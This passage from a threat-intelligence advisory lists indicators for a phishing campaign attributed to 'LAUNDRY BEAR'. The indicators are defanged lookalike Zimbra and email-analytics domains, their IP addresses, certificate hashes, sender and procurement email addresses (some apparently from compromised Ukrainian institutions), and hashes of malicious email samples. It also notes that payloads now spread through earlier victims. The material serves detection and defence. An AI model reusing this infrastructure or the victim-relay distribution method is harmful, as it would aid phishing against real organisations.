&lt;div class=&quot;TableCellContent SCXW193774983 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW193774983 BCX8&quot;&gt;
&lt;p&gt;8 July 2025&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW193774983 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW193774983 BCX8&quot;&gt;
&lt;p&gt;15 October 2025&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW193774983 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW193774983 BCX8&quot;&gt;
&lt;p&gt;zimbra-metadata[.]com&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW193774983 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW193774983 BCX8&quot;&gt;
&lt;p&gt;216.252.238[.]18&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW193774983 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW193774983 BCX8&quot;&gt;
&lt;p&gt;20 August 2025&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW193774983 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW193774983 BCX8&quot;&gt;
&lt;p&gt;14 October 2025&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW193774983 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW193774983 BCX8&quot;&gt;
&lt;p&gt;analyticemailmeter[.]com&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW193774983 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW193774983 BCX8&quot;&gt;
&lt;p&gt;37.120.247[.]228&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW193774983 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW193774983 BCX8&quot;&gt;
&lt;p&gt;24 September 2025&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW193774983 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW193774983 BCX8&quot;&gt;
&lt;p&gt;18 March 2026&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW193774983 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW193774983 BCX8&quot;&gt;
&lt;p&gt;emailanalytics.com[.]ua&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW193774983 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW193774983 BCX8&quot;&gt;
&lt;p&gt;185.86.79[.]95&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW193774983 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW193774983 BCX8&quot;&gt;
&lt;p&gt;24 September 2025&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW193774983 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW193774983 BCX8&quot;&gt;
&lt;p&gt;18 March 2026&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW193774983 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW193774983 BCX8&quot;&gt;
&lt;p&gt;mailnalysis[.]com&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW193774983 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW193774983 BCX8&quot;&gt;
&lt;p&gt;104.248.134[.]194&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW193774983 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW193774983 BCX8&quot;&gt;
&lt;p&gt;11 November 2025&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW193774983 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW193774983 BCX8&quot;&gt;
&lt;p&gt;17 February 2026&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW193774983 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW193774983 BCX8&quot;&gt;
&lt;p&gt;zimbrastat[.]com&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW193774983 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW193774983 BCX8&quot;&gt;
&lt;p&gt;64.226.124[.]190&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW193774983 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW193774983 BCX8&quot;&gt;
&lt;p&gt;18 December 2025&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW193774983 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW193774983 BCX8&quot;&gt;
&lt;p&gt;18 March 2026&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW193774983 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW193774983 BCX8&quot;&gt;
&lt;p&gt;zimbrasoft.com[.]ua&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW193774983 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW193774983 BCX8&quot;&gt;
&lt;p&gt;193.238.152[.]66&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW193774983 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW193774983 BCX8&quot;&gt;
&lt;p&gt;20 January 2026&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW193774983 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW193774983 BCX8&quot;&gt;
&lt;p&gt;18 March 2026&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW193774983 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW193774983 BCX8&quot;&gt;
&lt;p&gt;synacorzimbra[.]nl&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW193774983 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW193774983 BCX8&quot;&gt;
&lt;p&gt;216.252.238[.]64&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW193774983 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW193774983 BCX8&quot;&gt;
&lt;p&gt;3 February 2026&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW193774983 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW193774983 BCX8&quot;&gt;
&lt;p&gt;30 March 2026&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW193774983 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW193774983 BCX8&quot;&gt;
&lt;p&gt;istc-cloud[.]com&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW193774983 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW193774983 BCX8&quot;&gt;
&lt;p&gt;194.156.103[.]193&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW193774983 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW193774983 BCX8&quot;&gt;
&lt;p&gt;5 February 2026&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW193774983 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW193774983 BCX8&quot;&gt;
&lt;p&gt;30 March 2026&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;table8&quot;&gt;&lt;/a&gt;&lt;/p&gt;
&lt;table dir=&quot;ltr&quot; class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;&lt;em&gt;&lt;strong&gt;Table 8: Flowerbed X.509 certificate SHA-1 hashes &amp;nbsp;&lt;/strong&gt;&lt;/em&gt;&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW66173475 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW66173475 BCX8&quot;&gt;
&lt;p&gt;&lt;strong&gt;Associated Domain&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW66173475 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW66173475 BCX8&quot;&gt;
&lt;p&gt;&lt;strong&gt;X.509 SHA-1 Hash&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW66173475 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW66173475 BCX8&quot;&gt;
&lt;p&gt;&lt;strong&gt;First Seen&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW66173475 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW66173475 BCX8&quot;&gt;
&lt;p&gt;&lt;strong&gt;Last Seen&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW66173475 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW66173475 BCX8&quot;&gt;
&lt;p&gt;zmailanalytics[.]com&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW66173475 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW66173475 BCX8&quot;&gt;
&lt;p&gt;2e4f314bc9943cab5005d6fde0b271c74d47bc9d&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW66173475 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW66173475 BCX8&quot;&gt;
&lt;p&gt;8 Jul 2025&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW66173475 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW66173475 BCX8&quot;&gt;
&lt;p&gt;6 Aug 2025&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW66173475 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW66173475 BCX8&quot;&gt;
&lt;p&gt;*.i.zmailanalytics[.]com&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW66173475 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW66173475 BCX8&quot;&gt;
&lt;p&gt;50a87d926621dd06389ba50d86e0ff574ed713a8&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW66173475 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW66173475 BCX8&quot;&gt;
&lt;p&gt;6 Aug 2025&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW66173475 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW66173475 BCX8&quot;&gt;
&lt;p&gt;13 Oct 2025&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW66173475 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW66173475 BCX8&quot;&gt;
&lt;p&gt;*.i.zimbra-metadata[.]com&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW66173475 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW66173475 BCX8&quot;&gt;
&lt;p&gt;c5a72420e7bb308d078e62128430897f82194c95&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW66173475 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW66173475 BCX8&quot;&gt;
&lt;p&gt;20 Aug 2025&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW66173475 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW66173475 BCX8&quot;&gt;
&lt;p&gt;14 Oct 2025&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW66173475 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW66173475 BCX8&quot;&gt;
&lt;p&gt;*.i.analyticemailmeter[.]com&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW66173475 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW66173475 BCX8&quot;&gt;
&lt;p&gt;8959c4d29e29f02ea94ea8bb21c8df2594c5549d&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW66173475 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW66173475 BCX8&quot;&gt;
&lt;p&gt;24 Sep 2025&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW66173475 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW66173475 BCX8&quot;&gt;
&lt;p&gt;8 Nov 2025&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW66173475 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW66173475 BCX8&quot;&gt;
&lt;p&gt;*.i.emailanalytics.com[.]ua&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW66173475 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW66173475 BCX8&quot;&gt;
&lt;p&gt;62eb76432597694edb01c1fe57aab0cfe03a7178&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW66173475 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW66173475 BCX8&quot;&gt;
&lt;p&gt;25 Sep 2025&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW66173475 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW66173475 BCX8&quot;&gt;
&lt;p&gt;27 Sep 2025&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW66173475 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW66173475 BCX8&quot;&gt;
&lt;p&gt;*.i.mailnalysis[.]com&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW66173475 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW66173475 BCX8&quot;&gt;
&lt;p&gt;cddf5c3be1e07f28140aed165b929bf2d614922a&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW66173475 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW66173475 BCX8&quot;&gt;
&lt;p&gt;12 Nov 2025&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW66173475 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW66173475 BCX8&quot;&gt;
&lt;p&gt;17 Dec 2025&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW66173475 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW66173475 BCX8&quot;&gt;
&lt;p&gt;*.i.zimbrastat[.]com&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW66173475 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW66173475 BCX8&quot;&gt;
&lt;p&gt;18b3ad442ce73cc8656d51d75bbd7c855f2cb7e8&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW66173475 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW66173475 BCX8&quot;&gt;
&lt;p&gt;18 Dec 2025&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW66173475 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW66173475 BCX8&quot;&gt;
&lt;p&gt;28 Dec 2025&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW66173475 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW66173475 BCX8&quot;&gt;
&lt;p&gt;*.i.zimbrasoft.com[.]ua&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW66173475 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW66173475 BCX8&quot;&gt;
&lt;p&gt;1b25041ececf2457eef0270fc1d785cec8ec9ded&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW66173475 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW66173475 BCX8&quot;&gt;
&lt;p&gt;21 Jan 2026&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW66173475 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW66173475 BCX8&quot;&gt;
&lt;p&gt;10 Feb 2026&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW66173475 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW66173475 BCX8&quot;&gt;
&lt;p&gt;*.i.synacorzimbra[.]nl&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW66173475 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW66173475 BCX8&quot;&gt;
&lt;p&gt;e4fe6466a4f9a4249fe330651e914e45bbdca44a&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW66173475 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW66173475 BCX8&quot;&gt;
&lt;p&gt;5 Feb 2026&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW66173475 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW66173475 BCX8&quot;&gt;
&lt;p&gt;22 Mar 2026&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW66173475 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW66173475 BCX8&quot;&gt;
&lt;p&gt;*.i.istc-cloud[.]com&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW66173475 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW66173475 BCX8&quot;&gt;
&lt;p&gt;b6b77c9a455225d525834a403ca9ef5481ed0447&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW66173475 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW66173475 BCX8&quot;&gt;
&lt;p&gt;12 Feb 2026&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW66173475 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW66173475 BCX8&quot;&gt;
&lt;p&gt;30 Mar 2026&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;LAUNDRY BEAR has used the following email addresses to procure resources used for this campaign:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;ivanka.zurabishvili@proton[.]me,&lt;/li&gt;
&lt;li&gt;zmul1@buildandconsulting[.]com,&lt;/li&gt;
&lt;li&gt;garrysmithme@pinmx[.]net, and&lt;/li&gt;
&lt;li&gt;hostingclient@pinmx[.]net.&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;&lt;strong&gt;Phishing distribution&lt;/strong&gt;&lt;/h4&gt;
&lt;p&gt;LAUNDRY BEAR primarily relied on ProtonMail for distribution of malicious email. However, as stated above, LAUNDRY BEAR’s more recent efforts likely have shifted to distributing the payload through previous victims. &amp;nbsp;&lt;/p&gt;
&lt;p&gt;The following email addresses have distributed payloads attributed to this campaign:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;c.laurent.ejfa@proton[.]me,&lt;/li&gt;
&lt;li&gt;j.moreau.epsc@proton[.]me,&lt;/li&gt;
&lt;li&gt;liberty.insights@proton[.]me,&lt;/li&gt;
&lt;li&gt;certain email addresses (presumably compromised) at the isofts.kiev[.]ua domain (i.e., ending with @isofts.kiev[.]ua), and&lt;/li&gt;
&lt;li&gt;certain email addresses (presumably compromised) at the navs.edu[.]ua domain (i.e., ending with @navs.edu[.]ua).&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Additionally, the following are SHA-256 hashes of email samples containing the malicious payload attributed to this campaign:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;98df604ecc57f884a2e6ce3266a0013ad64455cac48442c2312cfa4765007aaf,&lt;/li&gt;
&lt;li&gt;60db9abae75cd8ccc49dd7ea5feb41677566dcd442f12ebc5745ffd2810fb874,&lt;/li&gt;
&lt;li&gt;b1f5beb1175fc5c7d1806a2f0d900eb124c54f0286c5c52b66eea7a6633adb1d, and&lt;/li&gt;
&lt;li&gt;1517b3caa495f6c4e832df9c75fc94667e3c233773f7fa4e056d5e30e5ead760.&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;&lt;strong&gt;Post-compromise artifacts&lt;/strong&gt;&lt;/h4&gt;
&lt;p&gt;Currently, the script does not remove artifacts. This leaves additional opportunities to identify victims of this activity. While emphasis should always be placed on consistent monitoring of network traffic and endpoint activity, there are a variety of persistent artifacts described below that can be used to identify victims of this campaign.&lt;/p&gt;
